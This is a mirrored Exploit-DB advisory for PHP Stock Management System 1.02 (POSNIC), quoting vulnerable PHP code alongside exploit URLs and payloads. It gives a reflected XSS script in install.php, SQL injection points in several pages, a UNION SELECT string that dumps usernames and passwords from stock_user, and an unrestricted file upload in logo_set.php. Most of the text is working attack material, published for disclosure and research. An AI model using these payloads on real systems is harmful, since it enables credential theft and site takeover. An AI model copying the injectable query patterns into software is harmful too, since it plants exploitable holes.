bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/aix/dos/34588.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

189 lines
No EOL
4.4 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
#########################################################################################################
XSS install.php
code :
if(isset($_REQUEST['msg'])) {
$msg=$_REQUEST['msg'];
echo "<p style=color:red>$msg</p>";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
#########################################################################################################
SQL INJECTION : stock.php
code :
include_once("init.php");
$q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
while ($line = $db->fetchNextObject()) {
if (strpos(strtolower($line->name), $q) !== false) {
echo "$line->name\n";
}
}
exploit :
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
#########################################################################################################
SQL INJECTION : view_customers.php
code :
$SQL = "SELECT * FROM customer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
POST
searchtxt=1(inject)&Search=Search
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################
SQL INJECTION : view_product.php
code :
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$limit=$_GET['limit'];
$_GET['limit']=10;
}
$page = $_GET['page'];
if($page)
$start = ($page - 1) * $limit; //first item to display on this page
else
$start = 0; //if no page var is given, set start to 0
/* Get data. */
$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
}
$result = mysql_query($sql);
exploit :
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and
localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search
#########################################################################################################
UPLOAD : logo_set.php
code :
<?php if(isset($_POST['submit'])){
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
}
else
{
$upload= $_FILES["file"]["name"] ;
$type=$_FILES["file"]["type"];
exploit :
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################
AND MORE BUGS
Bye
#########################################################################################################
Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
sec4ever.com & alm3refh.com
#########################################################################################################
Reference in a new issue View git blame Copy permalink